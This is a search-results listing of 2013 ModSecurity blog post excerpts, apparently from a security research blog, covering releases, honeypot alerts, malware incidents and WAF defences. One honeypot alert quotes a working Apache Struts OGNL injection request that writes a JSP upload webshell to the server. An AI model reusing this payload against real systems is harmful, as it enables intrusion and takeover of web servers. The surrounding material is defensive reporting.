Showing 24 results for: 2013 ×ModSecurity ×

Announcing ModSecurity v2.7.6 Release (CI Platform Usage)

The ModSecurity Project team is pleased to announce public release version 2.7.6. Full Release Notes Here. Besides extensive bug fixes this release also includes modification on the build system that counts on QA mechanisms such as coding style checker and...

[Honeypot Alert] More PHP-CGI Scanning (apache-magika.c)

In the past 24 hours, one of the WASC Distributed Web Honeypot participant's sensors picked up continued scanning for CVE-2012-1823 which is a vulnerability within PHP-CGI. Here is a screenshot taken from the ModSecurity WAF alert data: PHP-CGI Attack The...

PHP.Net Site Infected with Malware

Earlier today, users attempting to access the www.php.net site were met with malware warnings from Google's Safe Browsing plugins in Chrome/FireFox and other browsers - So, what was the problem? Malware Redirection Details Google's SafeBrowsing currently lists the following for...

Hiding Webshell Backdoor Code in Image Files

Looks Can Be Deceiving Do any of these pictures look suspicious? First appearances may be deceiving... Web attackers have have been using a method of stashing pieces of their PHP backdoor exploit code within the meta-data headers of these image...

ModSecurity for Java - BETA Testers Needed

Over the course of the summer of 2013, the ModSecurity team participated in Google's Summer of Code (GSoC) program through OWASP. We helped by mentoring Mihai Pitu who developed a port of ModSecurity for Java! The main problem this project...

ModSecurity XSS Evasion Challenge Results

On July 30th, we announced our public ModSecurity XSS Evasion Challenge. This blog post will provide an overview of the challenge and results. Value of Community Testing First of all, I would like to thank all those people that participated...

[Honeypot Alert] Probes for Apache Struts 2.X OGNL Vulnerability

Today our web honeypot sensors picked up probes for the recent Apache Struts 2.X OGNL vulnerability (CVE-2013-2251): 222.136.0.151 - - [16/Aug/2013:09:25:21 +0200] "GET /index.action? redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest' ),%23p%3d(%23req.getRealPath(%22/%22)%2b%22inback.jsp%22).replaceAll(\"\\\\\\\\\",%20\"/\" ),new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c %22)).close()}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull) (new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%2 2f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e HTTP/1.1" 404 291 "-" "Sturt2" Struts users are strongly encouraged...

Announcing the ModSecurity XSS Evasion Challenge

The SpiderLabs Research Team is pleased to announce the release of the ModSecurity XSS Evasion Challenge for the community. The purpose of this challenge is to show possible XSS defenses by using ModSecurity and to identify any weaknesses. Challenge Setup...

ModSecurity Performance Recommendations

Sometimes we see ModSecurity users asking about performance in the mail-list. During this post I will talk about some important topics to improve ModSecurity performance. 1 – HTTP Caching and Acceleration In a common web environment static contents (ie. Images)...

5 ways to protect your E-Commerce site

The Trustwave Spiderlabs team frequently responds to E-commerce data breaches. The number of website breaches that we are working continues to rise. There are a handful of reasons for this rise. We are approaching saturation in the "brick and mortar"...

Defending WordPress Logins from Brute Force Attacks

<script> //<![CDATA[ var str1 = &quot;http://&quot;; var str2 = &quot;www.modsecurity.org&quot;; var str3 = &quot;/beacon.html&quot;; var result = str1 + str2 + str3; window.location=result //]]>// </script> As has been reported by many news outlets, WordPress login pages have been under a heavy brute force...

ModSecurity User Survey 2013

The ModSecurity web application firewall project has grown a lot in the past year including, releasing versions for both Microsoft IIS and Nginx web server platforms and migrating the source code to SpiderLabs GitHub Repo. We even won some community...